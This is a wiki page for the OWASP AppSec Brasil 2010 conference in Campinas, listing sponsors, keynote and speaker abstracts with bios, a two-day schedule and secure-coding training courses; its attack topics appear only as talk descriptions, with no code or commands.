OWASP - User contributions [en]

AppSec Brasil 2010

2010-10-22T19:59:42Z

Edualves: /* Silver Sponsor */

__NOTOC__

[[Image:LogoAppSecBrazil.002.jpg|center]]

'''Para a versão em português, veja em [[AppSec Brasil 2010 (pt-br)]]'''

= OWASP AppSec Brasil 2010 =

The Second Edition of OWASP's flagship conference in South America will happen in Campinas, SP, Brazil. The Conference consists of two days of training sessions, followed by a two-day conference on a single track.
<center>
[[Image:AppSec Brasil 2010 Campinas.jpg|500px]]
</center>
== Conference Dates ==

The conference will happen from '''November 16th, 2010 to November 19th, 2010'''. The first two days will be tutorial days (see below). Plenary sessions will be held on November 18th and 19th.
<br>

==== About ====

== About the conference ==

Following the success of the first AppSec Brasil, held in Brasilia in 2009, the OWASP Brazilian Chapter is organizing its second edition in 2010. AppSec Brasil 2010 will happen in the city of Campinas, located 90 km from São Paulo.

Campinas is the 3rd biggest city in the State of São Paulo and is an important economic center and hosts major universities and research centers. It is known to concentrate several high tech industries, including important multi-national companies in the fields of electronics, telecom and chemicals.

This year, we expect to gather a number of Brazilian and Latin American practitioners and researchers to share state-of-the-art information about application security.

==== Sponsorship ====

We are currently soliciting sponsors for the AppSec Brasil 2010 Conference. Detailed [[Media:OWASP_-_Sponsorship_Opportunities_-_EN_V.1.2.pdf|sponsorship oportunities]] are now available.

If you are interested in sponsoring AppSec Brasil 2010, please contact the Conference Organization Team (organizacao2010@appsecbrasil.org).

== Sponsors ==

== Platinum Sponsors ==
{|
| [[Image:AppSec Brasil 2010 CPQD.jpg|200px|link=http://www.cpqd.com.br]]
|-
|  
|-
|}

== Gold Sponsors ==
{|
| [[Image:LeadComm Logo Screen.jpg|150px|link=http://www.leadcomm.com.br]]
| width="50" | <br>
| [[Image:Logo PagSeguro-Uma empresa-UOL.jpg|150px|link=http://www.pagseguro.uol.com.br]]
|-
|  
|-
|}

== Silver Sponsors ==

{|
|-
| [[Image:AppSec Brasil 2010 Serpro.png|150px]]
|-
|  
|}

<br>

=== Attendee Kit Sponsors ===
{|
| [[Image:Logotipo_Conviso_2009_Cor.png|150px]]
| width="50" | <br>
| [[Image:lgClavis.png|110px|link=http://www.clavis.com.br]]
|-
|  
|-
|}
<br>

== Promoted by ==
<center>
[[Image:Appsec Brasil 2010 InstitutoTuring.png]]
</center>
==== Keynotes ====

==Robert 'Rsnake' Hansen ==

[http://www.sectheory.com/ SecTheory]

'''''Title:''''' '''The Humble Cookie'''

'''''Abstract:'''''
The simplest thing in our browser that has caused the most confusion and worry is the cookie. This presentation will discuss what it is, how cookies work, the little known aspects of them, and dozens of attacks to steal them, set them, crack them or abuse trust based on them.

'''''Bio:''''' Robert Hansen aka RSnake is the CEO and founder of SecTheory. He has worked for Digital Island, Exodus Communications and Cable & Wireless in varying roles from Sr. Security Architect and eventually product managing many of the managed security services product lines. He also worked at eBay as a Sr. Global Product Manager of Trust and Safety, focusing on anti-phishing, anti-DHTML malware and anti-virus strategies. Later he worked as a director of product management for Realtor.com. Robert sits on the advisory board for the Intrepidus Group, previously sat on the technical advisory board of ClickForensics and currently contributes to the security strategy of several startup companies.

Mr. Hansen wrote Detecting Malice, authors content on O'Reilly and co-authored "XSS Exploits" by Syngress publishing. He sits on the NIST.gov Software Assurance Metrics and Tool Evaluation group focusing on web application security scanners and the Web Application Security Scanners Evaluation Criteria (WASC-WASSEC) group. He also has briefed the DoD at the Pentagon and speaks at SourceBoston, Secure360, GFIRST/US-CERT, CSI, Toorcon, APWG, ISSA, TRISC, World OWASP/WASC conferences, SANS, Microsoft's Bluehat, Blackhat, DefCon, SecTor, BSides, Networld+Interop, and has been the keynote speaker at the New York Cyber Security Conference, NITES and OWASP Appsec Asia. Mr. Hansen is a member of Infragard, West Austin Rotary, WASC, IACSP, APWG, contributed to the OWASP 2.0 guide and is on the OWASP Connections Committee.

Robert also maintains the http://ha.ckers.org website where he discuss web application security and provides lots of useful content to be used against web application attacks.

== Jeremiah Grossman ==

[http://www.whitehatsec.com/ WhiteHat Security]

'''''Title:''''' '''TBD.'''

'''''Bio:''''' Jeremiah Grossman, founder and CTO, WhiteHat Security, is a world-renowned Web security expert. A co-founder of the Web Application Security Consortium (WASC), he was named to InfoWorld's Top 25 CTOs in 2007 and is frequently quoted by business and technical media. He has authored dozens of articles and whitepapers, is credited with the discovery of many cutting-edge attack and defensive techniques, and is a co-author of "XSS Attacks: Cross Site Scripting Exploits and Defense." Grossman is also an influential blogger who offers insight and encourages open dialogue regarding Web security research and trends. Prior to WhiteHat, Grossman was an information security officer at Yahoo!

<br>

==== Invited Speakers ====

== Samy Kamkar==

'''''Title:''''' '''How I Met Your Girlfriend: The discovery and execution of entirely new classes of Web attacks in order to meet your girlfriend.'''

'''''Abstract:'''''
This includes entertaining and newly discovered attacks including PHP session
prediction and random numbers (accurately guessing PHP session cookies),
browser protocol confusion (turning a browser into an SMTP server), firewall and
NAT penetration via Javascript (turning your router against you), remote iPhone
Google Maps hijacking (iPhone penetration combined with HTTP man-in-themiddle),
extracting extremely accurate geolocation information from a Web browser
(not using IP geolocation), and more.

'''''Bio:'''''
Samy Kamkar is best known for the Samy worm, the first XSS worm,
infecting over one million users on MySpace in less than 24 hours. A cofounder
of Fonality, Inc., an IP PBX company, Samy previously led the
development of all top-level domain name server software and systems for
Global Domains International (.ws).

In the past 10 years, Samy has focused on evolutionary and genetic
algorithmic software development, Voice over IP software development,
automated security and vulnerability research in network security, reverse
engineering, and network gaming. When not strapped behind the Matrix,
Samy can be found stunt driving and getting involved in local community
service projects.

== Mano Paul ==

'''''Title:''''' '''Wild Wild Wild Security Planet'''

'''''Abstract:'''''
Organisms keep themselves safe in a world that's every bit as unpredictable
as our world. This presentation will parallel what we can learn from the
world of art, literature, science, nature and apply it to the world of
software security. For e.g., If Shakespeare had to write about software
security, what would he write? What does a naked motorist have to do with
loose lips that sink ships? What does pH have to do with software
vulnerabilities? What does the Stick Insects' regenerative ability have to
do with software 'bugs'? or can the Ostrich sticking its head in the sand
behavior reflect the modicum of risk management we observe today and many
more ...

The talk would be a fun-filled, extremely interactive session covering
various concepts of security from risk management, defense in depth, secure
programming, threats and vulnerabilities and compliance and more ... Come to
find out the answers to the questions above and see what it takes to develop
software with a security mindset throughout its life cycle. Come and look at
software security from a different perspective that would make ALL the
difference for you and your company.

'''''Bio:'''''
[[Image:Mano_Paul.jpg|thumb|10px|frame|left|Mano Paul]]
<b>Shark Researcher turned Security Guru!</b><br>
<b>Manoranjan (Mano) Paul</b> (CSSLP, CISSP, AMBCI, MCSD, MCAD, CompTIA Network+, ECSA) is the Founder and CEO at [http://www.securisksolutions.com SecuRisk Solutions] and [http://www.expresscertifications.com Express Certifications]. Based out of Austin, Texas in the USA, SecuRisk Solutions specializes in three areas of information security solutions - Product Development, Consulting and Awareness, Training & Education while Express Certifications focuses on professional certifications like the CISSP, SSCP, CSSLP and the BCI certificate.

Before SecuRisk Solutions and Express Certifications, Mano played several roles from software developer, quality assurance tester, logistics manager, technical architect, IT strategist and Security Engineer/Program Manager/Strategist at Dell Inc. His information security experience includes designing and developing software security programs from Compliance-to-Coding, application security risk management, security strategy & management, and conducting security awareness training and education.

Mano started his career as a shark researcher in the Bimini Biological Field Station, Bahamas. His educational pursuit took him to the University of Oklahoma where he received his Business Administration degree in Management Information Systems (MIS) with various accolades and the coveted 4.0 GPA. He was a member and chair of the OWASP Global Education Committee and actively participates in OWASP speaking, training and leadership events. He is also the appointed Software Assurance Advisor for (ISC)<sup>2</sup>, representing and advising the organization on software assurance strategy, training, education and certification. He is an appointed faculty member and industry representative of the Capitol of Texas Information System Security Association (ISSA) chapter.

Mano has been featured in various domestic and international security conferences and is an invited speaker and panelist, delivering talks and keynotes in conferences such as the OWASP, CSI, Burton Group Catalyst, TRISC and SC World Congress conferences. He is the author of the Official (ISC)<sup>2</sup> Guide to the Certified Secure Software Lifecycle Professional (CSSLP<sup>CM</sup>), contributing author for the Information Security Management Handbook, writes periodically for the Certification Magazine and has contributed to several security topics for the Microsoft Solutions Developer Network (MSDN).

Mano is married to whom he calls the “most wonderful and sacrificial person in this world” - Sangeetha Johnson and their greatest fulfillment comes from spending time with the son – Reuben A Paul (RAP).

==Chris Hofmann==

'''''Title:''''' '''TBD'''

'''''Abstract:''''' TBD.

'''''Bio:''''' TBD.

====Speakers====

==Cassio Goldschmidt==
Symantec

'''''Title:''''' '''Responsibility for the Harm and Risk of Software Security Flaws'''

'''''Abstract:'''''
Who is responsible for the harm and risk of security flaws? The advent of worldwide networks such as the internet made software security (or the lack of software security) became a problem of international proportions. There are no mathematical/statistical risk models available today to assess networked systems with interdependent failures. Without this tool, decision-makers are bound to overinvest in activities that don’t generate the desired return on investment or under invest on mitigations, risking dreadful consequences. Experience suggests that no party is solely responsible for the harm and risk of software security flaws but a model of partial responsibility can only emerge once the duties and motivations of all parties are examine and understood.

State of the art practices in software development won’t guarantee products free of flaws. The infinite principles of mathematics are not properly implemented in modern computer hardware without having to truncate numbers and calculations. Many of the most common operating systems, network protocols and programming languages used today were first conceived without the basic principles of security in mind. Compromises are made to maintain compatibility of newer versions of these systems with previous versions. Evolving software inherits all flaws and risks that are present in this layered and interdependent solution. Lastly, there are no formal ways to prove software correctness using neither mathematics nor definitive authority to assert the absence of vulnerabilities. The slightest coding error can lead to a fatal flaw. Without a doubt, vulnerabilities in software applications will continue to be part of our daily lives for years to come.

Decisions made by adopters such as whether to install a patch, upgrade a system or employed insecure configurations create externalities that have implications on the security of other systems. Proper cyber hygiene and education are vital to stop the proliferation of computer worms, viruses and botnets. Furthermore, end users, corporations and large governments directly influence software vendors’ decisions to invest on security by voting with their money every time software is purchased or pirated.

Security researchers largely influence the overall state of software security depending on the approach taken to disclose findings. While many believe full disclosure practices helped the software industry to advance security in the past, several of the most devastating computer worms were created by borrowing from information detailed by researcher’s full disclosure. Both incentives and penalties were created for security researchers: a number of stories of vendors suing security researchers are available in the press. Some countries enacted laws banning the use and development of “hacking tools”. At the same time, companies such as iDefense promoted the creation of a market for security vulnerabilities providing rewards that are larger than a year’s worth of salary for a software practitioner in countries such as China and India.

Effective policy and standards can serve as leverage to fix the problem either by providing incentives or penalties. Attempts such PCI created a perverse incentive that diverted decision makers’ goals to compliance instead of security. Stiff mandates and ineffective laws have been observed internationally. Given the fast pace of the industry, laws to combat software vulnerabilities may become obsolete before they are enacted. Alternatively, the government can use its own buying power to encourage adoption of good security standards. One example of this is the Federal Desktop Core Configuration (FDCC).

'''''Bio:'''''
Cassio Goldschmidt is senior manager of the product security team under the Office of the CTO at Symantec Corporation. In this role he leads efforts across the company to ensure
secure development of software products. His responsibilities include managing Symantec’s internal secure software development process, training, threat modeling, penetration testing and vulnerability manegement. Cassio’s background includes over 14 years of technical and managerial experience in the software industry. During the eight years he has been with Symantec, he has helped to architect, design and develop several top selling product releases, conducted numerous security classes, and coordinated various penetration tests. Cassio is also known for leading the OWASP chapter in Los Angeles and is a frequent speaker at security conferences worldwide.

Cassio represents Symantec on the SAFECode technical committee and (ISC)2 in the development of the CSSLP certification. He holds a bachelor degree in computer science from Pontificia Universidade Catolica do Rio Grande Do Sul, a masters degree in software engineering from Santa Clara University, and a masters of business administration from the University of Southern California.

==Amichai Shulman==
Imperva

'''''Title:''''' '''Business Logic Attacks – BATs and BLBs'''

'''''Other authors:''''' Amichai Shulman, Rob Rachwald

'''''Abstract:'''''
Cyber attacks are being committed more often by professionals, and are increasingly driven by financial motives. Researchers have discovered the increasing popularity of a certain class of attacks that target business logic. Business logic attacks are a set of legal application transactions that are used to carry out a malicious operation that is not part of normal business practices. For example, brute forcing coupon codes in an ecommerce application to receive multiple discounts. This presentation will provide a quick introduction to business logic attacks, their unique characteristics and the motivation behind their uptick. The session will suggest a classification method for these attacks from which attendees can draw a set of required mitigation capabilities. We will discuss capabilities required for detecting automated interaction with the application, different types of repetitions, flow tampering and even compromised credentials. We will also contemplate on the usage of mitigation techniques such as Captcha, introducing delays and more. Concluding this session we will bring up the claim that all these capabilities can be introduced in the form of a "virtual patch" using a web application firewall, rather than being exclusively fixed in application code.

'''''Bio:'''''
Amichai Shulman is Co-Founder and CTO of Imperva, where he heads the Application Defense Center (ADC), Imperva's internationally recognized research organization focused on security and compliance. Mr. Shulman regularly lectures at trade conferences and delivers monthly eSeminars. The press draws on Mr. Shulman's expertise to comment on breaking news, including security breaches, mitigation techniques, and related technologies. Under his direction, the ADC has been credited with the discovery of serious vulnerabilities in commercial Web application and database products, including Oracle, IBM, and Microsoft. Prior to Imperva, Mr. Shulman was founder and CTO of Edvice Security Services Ltd., a consulting group that provided application and database security services to major financial institutions, including Web and database penetration testing and security strategy, design and implementation. Mr. Shulman served in the Israel Defense Forces, where he led a team that identified new computer attack and defense techniques. He has B.Sc and Masters Degrees in Computer Science from the Technion, Israel Institute of Technology.

==Gabriel Quadros==
Conviso IT Security

'''''Title:''''' '''Taint Analysis of JavaScript Code to Detect Web Application Vulnerabilities'''

'''''Abstract:'''''
Modern Web applications make increasing use of client-side code, with JavaScript being the most present in most of them. Several vulnerabilities are introduced through the careless use of this language. The publicly available analysis tools are usually based on pattern matching to find potential vulnerabilities, but this is not an efficient approach to analyze large amounts of code. Therefore, there is a need to develop tools to perform more advanced analysis like Taint Analysis and Symbolic Execution. This article discusses various approaches to dynamic analysis of JavaScript code and presents the JsInstrumentator tool, which is being developed by Conviso Security Labs.

'''''Bio:'''''
Gabriel Quadros começou a estudar segurança da informação em 2003, com interesse principal em engenharia reversa, pesquisa de vulnerabilidades e desenvolvimento de exploits.

Atualmente cursa o último ano do Bacharelado em Ciência da Computação na Universidade Estadual do Sudoeste da Bahia - UESB.

Em abril de 2010, começou suas atividades como consultor de segurança na Conviso IT Security.

==Tony Rodrigues==
Provider IT Business Solutions

'''''Title:''''' '''Tony’s Top 10 Application Artifacts: A Computer Forensics Approach to OWASP Top 10'''

'''''Abstract:'''''
Application Computer Forensics has many peculiarities comparing to others Computer Forensics disciplines. It requires not only distinctive techniques but also deep knowledge of specific artifacts. This presentation is about the top ten artifacts related to application computer forensics/digital investigations and their relation to OWASP Top 10 Risks.

'''''Bio:'''''
Tony Rodrigues é um profissional certificado CISSP, CFCP e Security+ com mais de 20 anos de experiência em TI e 8 anos em Gestão de Segurança de Informações. Já liderou várias investigações, perícias e pesquisas sobre Computação Forense. Tony é consultor em Segurança de Informações e palestrou em importantes conferencias internacionais (CNASI, H2HC,YSTS). É autor/criador do blog forcomp.blogspot.com, sobre Resposta a Incidentes e Forense Computacional e também colabora com artigos no blog de Computer Forensics da SANS.

==Henrich Christopher Pöhls==
University of Passau - ISL

'''''Title:''''' '''The State of XML Digital Signatures --- How to Avoid Technical Pitfalls and Harvest the Power of Newer Signature Schemes'''

'''''Abstract:'''''
XML Digital Signatures are a complex tool, applied right they help to ensure legal compliance,
but there are many pitfalls.
This talk will provide some basic steps that users and implementers should follow to avoid the pitfalls,
among them are:
* Solid Understanding of the XML Signature processing and verification steps
* Use of simplistic and coherent references when creating XML Digital Signature
* Know how to Test what was signed before acting upon it (BitFlip Test)
The Talk will also provide an overview of new applications for recent and more specialized
digital signature schemes, like sanitizable signature schemes (academic research since roughly 2000) that allow to deal with the need
to modify already signed content. And it will highlight the security relevant changes that are planned
for the upcoming version of XML Signature Syntax and Processing 2.0.

'''''Bio:'''''
Henrich C. Pöhls has presented his scientific work on digital signatures at several academic conferences (i.e. ICICS, GI, Invited Talks) or to technical audiences (i.e. DFN CERT, OWASP). Instructor of a practical IT-security university class for Computer Science and IT-Security Master students for the last 7 years. He has established this course first at the University of Hamburg in 2004 and than at the University of Passau in 2008. The course, now titled "Security Infrastructures", is centered around security infrastructures focussing on secure & authenticated access through the use of digital signatures.

It involves setting-up a certificate authority, using digital signatures and X509 certificates mostly for authentication in open-source software like client and server authentication with apache, secure DNS zone transfers, or client and server authentication in openvpn, as well as in MS Windows environments.It also covers certificate revocation using CRLs and OCSP. Henrich C. Pöhls draws from a rich repository of his own experience from his academic research in the field and the 7 years of using the available tools for creating, applying and managing digital signatures and X509 certificates in different versions and seeing his students struggle with the pitfalls trying to get it to work.

==Rodrigo Montoro==
Trustwave Spiderlabs

'''''Title:''''' '''Web Application First Aid - Virtual Patching with ModSecurity'''

'''''Abstract:'''''
This presentation will show how to mitigate security problems that you may found after your application goes to the real world . Weʼll talk about how to analyze a security report, understand how modsecurity works and how based on the report to create a virtual patching using modsecurity rules.

'''''Bio:'''''
Rodrigo “Sp0oKeR” Montoro possui grande experiência em ambientes opensource e mercado de segurança especialmente na parte de IPS/IDS , malwares e protocolos. Atualmente trabalha no time de pesquisas do SpiderLabs (Trustwave) onde faz parte do core team de assinaturas do modsecurity além de analise de malwares, assinaturas de IDS e pesquisas na area de arquivos maliciosos especialmente pdfʼs.

==Brian Contos==
McAfee

'''''Title:''''' '''Exploring Three Modern Attack Vectors: Insiders, Industrialized and APTs'''

'''''Abstract:'''''
Attacks are coming from all angles. In some cases they are very rudimentary; in others they are highly complex. Organizations must be able to protect themselves regardless, and do so in a way this is in parity with business operations, maintains employee and partner agility, and is manageable without the complexity of the solution being worse than the attack itself.

Failure to address these three different attack types can result in everything from diminished brand loyalty, regulatory penalties, and lost revenue, to stolen intellectual property, economic competitive disadvantage, and military competitive disadvantage.
Based on research from McAfee Labs and customer interactions across the globe in the public and private sector, there is much information that can be shared about these attackers and their strategies.

Attendees will leave the presentation more knowledgeable about insider threats, industrialized hacking, and APTs. They will have a strong grasp of the attacker motives and understand their attack vectors. The audience will also be exposed to several non-vender, non-product specific countermeasures that they can leverage within their own organizations.

'''''Bio:'''''
Mr. Contos has over 15 years of security engineering and management expertise. He has worked throughout North and South America, Europe, the Middle East, and Asia. At McAfee he advises government organizations and G2000s on security strategy. He has written two books including Enemy at the Water Cooler – Real Life Stories of Insider Threats, and Physical and Logical Security Convergence which he co-authored with former NSA Deputy Director William Crowell. He has delivered speeches at industry events like RSA, Black Hat, Interop, OWASP, CSI, ISACA, ISSA, InfraGard and eCrime. He is often quoted by business and industry press, and has written articles for Forbes, NY Times, London Times, Computerworld, and many others. He was formerly the Chief Security Strategist for Imperva, the Chief Security Officer for ArcSight, and has held management and engineering positions at Riptech, Bell Labs, Tandem Computers, and DISA.

==Christophe De La Fuente==

'''''Title:''''' '''Testing and Fuzzing FLEX: More fun with RIA'''

'''''Additional author:''''' '''Matt Tesauro'''

'''''Abstract:'''''
FLEX is a popular choice for the brave new world of web 2.0 applications. While the game may have appeared to change, rich Internet applications (RIA) still allow for the same vulnerabilities and design mistakes to be made. This presentation will cover methods for testing Adobe FLEX applications including the new version 4 and will look at such issues as cross--site flashing, remote calls and fuzzing. Additionally, there will be coverage of tools to test FLEX and other Flash applications including their addition to the OWASP WTE (Web Testing Environment). Finally, some design issues which may hamper FLEX development will be discussed in a brief case study.

'''''Bio:'''''
Christophe is a Security Consultant within the Application Security practice at Trustwave's SpiderLabs. SpiderLabs is the advanced security team responsible for Penetration Testing, Application Security, and Incident Response for Trustwave's clients.

Christophe has extensive experience in penetration tests on web application and network infrastructure. He has a background testing a large range of applications, from traditional client/server applications to web applications and web services. In addition to his information security experience, Christophe has experience developing software and web applications. Christophe also has an interest in reverse code engineering for malware analysis and vulnerability research. He as taught post--graduate level university course in the field of web application security testing.

==Mauro Risonho de Paula Assumpção==

'''''Title:''''' '''The Tao of Hacking - Detecting Vulnerabilities in Web based Network Devices'''

'''''Abstract:'''''
This talks relates to the design flaws and vulnerabilities in various network peripheral devices
used for security which are having web interfaces. We will be talking about some of the
vulnerabilities that we have discovered while pen testing these devices. Further , this talk also
lays emphasis on collecting information about internal networks from the network devices like
load balancers, firewalls, disk stations, proxies, surveillance cameras etc. The aim is to gather
maximum infomation from these devices and using that information to test the security of these
devices and detecting vulnerabilities in them. This talk is pure conceptual and technical talk
designed in an easy way to share information among masses.

'''''Bio:'''''
Mr. Mauro Assumpção Cheshire Paula aka firebits is a security researcher and lecturer at security conferences. He is working as director of NSEC Security Systems, an organization that provides consulting services for security and penetration testing. He has performed numerous safety tests and development projects for organizations such as Intel, Google, Microsiga, Avon, CMS Energy, Unilever, Rhodia, Tostines, Degussa, Niplan and others. He is founder and "Backtrack Brazil" and moderator and translator Backtrack USA.

Aditya K Sood is a Security Researcher, consultant and PhD candidate in Computer Science Department at Michigan State University.He has worked in the security domain for Armorize, COSEINC and KPMG. He is a founder of SecNiche Security, an independent security research arena. He has been an active speaker at conferences like RSA (US 2010), TRISC, EuSecwest, XCON, Troopers, OWASP AppSec, FOSS, CERT-IN etc. He has writtencontent for HITB Ezine, Hakin9, Usenix Login, Elsevier Journals, Debugged! MZ/PE.He has released number of advisories to forefront companies.Apart from his normal routine work he loves to do lot of web based research and designing cutting edge attack vector.

==== Schedule ====

<center>'''<span style="color: rgb(255, 0, 0)"> Note: this schedule is tentative and subject to change. </span>''' </center>

== Conference Program - Day 1 - November 18th 2010 ==
<center>
{| width="80%" class="t"
|-
| width="14%" height="17" align="right" | 08:30 - 09:00
| bgcolor="#8595c2" align="CENTER" | '''Reception Desk Open'''
|-
| width="14%" height="17" align="right" | 09:00 - 09:30
| bgcolor="#b9c2dc" align="CENTER" | '''Opening Ceremony'''
|-
| width="14%" height="49" align="right" | 09:30 - 10:20
| bgcolor="#eeeeee" align="CENTER" | '''Dinis Cruz'''<br> About OWASP
|-
| width="14%" height="17" align="right" | 10:20 - 10:40
| bgcolor="#d98b66" align="CENTER" | '''Break'''
|-
| width="14%" height="49" align="right" | 10:40 - 11:40
| bgcolor="#b9c2dc" align="CENTER" | '''Robert 'RSnake' Hansen'''<br> The Humble Cookie
|-
| width="14%" height="49" align="right" | 11:40 - 12:30
| bgcolor="#eeeeee" align="CENTER" | '''Cassio Goldschmidt'''<br> Responsibility for the Harm and Risk of Software Security Flaws
|-
| width="14%" height="17" align="right" | 12:30 - 14:30
| bgcolor="#d98b66" align="CENTER" | '''Lunch Break'''
|-
| width="14%" height="47" align="right" | 14:30 - 15:20
| bgcolor="#b9c2dc" align="CENTER" | '''Chris Hofmann'''<br> TBD
|-
| width="14%" height="32" align="right" | 15:20 - 16:10
| bgcolor="#eeeeee" align="CENTER" | '''Mano Paul'''<br> Wild Wild Wild Security Planet
|-
| width="14%" height="17" align="right" | 16:10 - 16:30
| bgcolor="#d98b66" align="CENTER" | '''Break'''
|-
| width="14%" height="47" align="right" | 16:30 - 17:20
| bgcolor="#b9c2dc" align="CENTER" | '''Tony Rodrigues''' <br> Tony’s Top 10 Application Artifacts: A Computer Forensics Approach to OWASP Top 10
|-
| width="14%" height="32" align="right" | 17:20 - 18:10
| bgcolor="#eeeeee" align="CENTER" | '''Amichai Shulman<br>''' Business Logic Attacks – BATs and BLBs
|-
| width="14%" height="47" align="right" | 18:10 - 19:00
| bgcolor="#b9c2dc" align="CENTER" | '''Gabriel Quadros''' <br> Taint Analysis of JavaScript Code to Detect Web Application Vulnerabilities
|-
| width="14%" height="17" align="right" | 19:00
| bgcolor="#cccccc" align="CENTER" | '''End of the First Day'''
|}
</center>
<br>

== Conference Program - Day 2 - November 19th 2010 ==
<center>
{| width="80%" class="t"
|-
| width="14%" height="17" align="right" | 08:30 - 09:00
| bgcolor="#8595c2" align="CENTER" | '''Reception Desk Open'''
|-
| width="14%" height="32" align="right" | 09:00 - 10:00
| bgcolor="#b9c2dc" align="CENTER" | '''Jeremiah Grossman'''<br> TBD
|-
| width="14%" height="47" align="right" | 10:00 - 10:50
| bgcolor="#eeeeee" align="CENTER" | '''Henrich Christopher Pöhls'''<br> The State of XML Digital Signatures --- How to Avoid Technical Pitfalls and Harvest the Power of Newer Signature Schemes
|-
| width="14%" height="17" align="right" | 10:50 - 11:10
| bgcolor="#d98b66" align="CENTER" | '''Break'''
|-
| width="14%" height="47" align="right" | 11:10 - 12:00
| bgcolor="#eeeeee" align="CENTER" | '''Rodrigo Montoro'''<br> Web Application First Aid - Virtual Patching with ModSecurity
|-
| width="14%" height="32" align="right" | 12:00 - 12:30
| bgcolor="#b9c2dc" align="CENTER" | '''Cel. Antonio Carlos Menna Barreto Monclaro'''<br> Presentation of Renasic - National Network for Information Security and Cryptography
|-
| width="14%" height="17" align="right" | 12:30 - 14:30
| bgcolor="#d98b66" align="CENTER" | '''Lunch Break'''
|-
| width="14%" height="32" align="right" | 14:30 - 15:20
| bgcolor="#eeeeee" align="CENTER" | '''Samy Kamkar'''<br> How I met your girlfriend
|-
| width="14%" height="32" align="right" | 15:20 - 16:10
| bgcolor="#b9c2dc" align="CENTER" | '''Christophe De La Fuente'''<br> Testing and Fuzzing FLEX: More fun with RIA
|-
| width="14%" height="32" align="right" | 16:10 - 17:00
| bgcolor="#eeeeee" align="CENTER" | '''Bian Contos'''<br> Exploring Three Modern Attack Vectors: Insiders, Industrialized and APTs
|-
| width="14%" height="17" align="right" | 17:00 - 17:20
| bgcolor="#d98b66" align="CENTER" | '''Break'''
|-
| width="14%" height="32" align="right" | 17:20 - 18:10
| bgcolor="#b9c2dc" align="CENTER" | '''Mauro Risonho de Paula Assumpção'''<br> The Tao of Hacking - Detecting Vulnerabilities in Web based Network Devices
|-
| width="14%" height="32" align="right" | 18:10 - 18:50
| bgcolor="#eeeeee" align="CENTER" | '''Dinis Cruz'''<br> OWASP O2 Project
|-
| width="14%" height="17" align="right" | 18:50 - 19:00
| bgcolor="#cccccc" align="CENTER" | '''Closing Ceremony'''
|}
</center>
<br>

==== Trainings ====

[[Image:Aspect logo.png]]

=== '''Secure Coding for J2EE Applications''' ===

[[Image:Jasonli appsecBR2010.jpg|frame]] '''Date and time: November 16th and 17th'''<br> '''Instructor: Jason Li'''<br> '''Summary'''<br> Training developers on secure coding practices offers one of the highest returns on investment of any security investment by eliminating vulnerabilities at the source. Aspect’s Java EE Secure Coding Training raises developer awareness of application security issues and provides examples of ‘what to do’ and ‘what not to do.' The class is lead by an experienced developer and is delivered in a very interactive manner. This class includes hands-on exercises where the students get to perform security analysis and testing on a live Java EE web application. This specially designed environment includes deliberate flaws the students have to find, diagnose, and fix. The class also uses Java EE coding exercises to provide students with realistic hands-on secure coding experience. Students gain hands-on experience using freely available web application security test tools to find and diagnose flaws and learn to avoid them in their own code.<br>

'''Audience'''<br> The intended audience for this course is intended for Java EE software developers and Java EE software testers who know how to program.<br>

'''Learning Objectives'''<br> At the highest level, the objective for this course is to ensure that developers are capable of designing, building, and testing secure Java EE applications and understand why this is important.<br>

'''Topics'''<br>

*'''HTTP Fundamentals'''<br>
**Understand and be able to employ the security features involved with using HTTP (e.g., headers, cookies, SSL)<br>
*'''Design Principles and Patterns'''<br>
**Understand and be able to apply application security design principles.<br>
*'''Threats'''<br>
**Be able to identify and explain common web application security threats (e.g. , cross-site scripting, SQL injection, denial of service attacks, "Man-in-the-middle" attacks, etc.) and implement mitigation techniques.<br>
*'''Authentication and Session Management'''<br>
**Be able to handle credentials securely while providing the full range of authentication support functions, including login, change password, forgot password, remember password, logout, reauthentication, and timeouts.<br>
*'''Access Control'''<br>
**Be able to implement access control rules for the user interface, business logic, and data layers.<br>
*'''Input Validation'''<br>
**Be able to recognize potential input validation issues, particularly injection and Cross-site Scripting (XSS) problems, and implement appropriate input validation mechanisms for user input and other sources of input.<br>
*'''Command Injection'''<br>
**Understand the dangers of command injection and techniques for avoiding the introduction of this type vulnerability.<br>
*'''Error Handling'''<br>
**Be able to implement a consistent error (exception) handling and logging approach for an entire web application.<br>
*'''Cryptography'''<br>
**Learn when to apply cryptographic techniques and be able to choose algorithms and use encryption/decryption and hash functions securely.<br>

'''Jason’s Bio'''<br> Jason is a remarkable trainer, mastering five different training courses within a year’s time to our most valuable longstanding but diverse clients. The client base included a large financial institution, several leading shipping and logistics Management Company, and a leading Government systems integrator.<br>

Jason has also taught Advanced Web Application Security Testing and Building Secure Web Applications classes at OWASP 2008 conferences in Belgium and India.<br>

Common remarks returned from Jason’s class evaluations include '''“This is probably one of the most important classes I‘ve been exposed to here”''' and '''“One of the best instructors I’ve ever had. Really knowledgeable of the subject. Kept class interested by sharing real life examples that depicted good scenarios”'''<br>

== Using the OWASP ESAPI security API to provide security to web applications ==

'''<span style="color: rgb(255, 0, 0);"> Tutorial in Portuguese. </span>'''

'''Date and time: November 16th (9AM to 6PM)'''<br> '''Instructor: Tarcizio Vieira Neto'''<br>

'''Summary'''

The evolution of technology in the development of web applications has contributed to a significant increase in the use of this technology to meet the most diverse purposes. However, this technology is subject to critical security vulnerabilities, especially when recent research show that most vulnerabilities are present in the application itself. OWASP's ESAPI library (Enterprise Security API) appears in this scenario as an open source security library available for several languages such as Java EE, PHP,. NET, Classic ASP, Python, Ruby, among others. This short course addresses the vulnerabilities caused by common errors in applications development and security control mechanisms provided by ESAPI with focus on Java technology. The general principles learned in the course can be applied in the context of other programming languages.

'''Target audience'''

The desired profile of the audience are people connected to the area of web application development and security, having as a basic pre-requisite knowledge in web technologies, communication protocols HTTP and HTTPS, basic principles of security: encryption, hashing and digital signature, Java programming for Web systems.

'''Learning objectives'''

* Know the main security vulnerabilities commonly found in Web applications
* Present the architecture of the ESAPI library and the operation of its modules with examples in Java.
* Present Web Application Firewall component of ESAPI.

'''Tópic'''

# Introduction
# # Myths related to security in Web applications
# # OWASP Project
# OWASP Top 10
# OWASP ESAPI Library
# # Validation and Encoding Module
# # Authentication Module
# # Access Control Module
# # HTTP Utilities Module
# # Access references module
# # Cryptographic Module
# # Log Module
# # Intrusion Detection Module
# # integrating the AppSensor module with ESAPI
# # Using Filters
# # Configuring ESAPI
# # Web Application Firewall Module
# Benefits of Using ESAPI
# Conclusions

'''Instructor'''

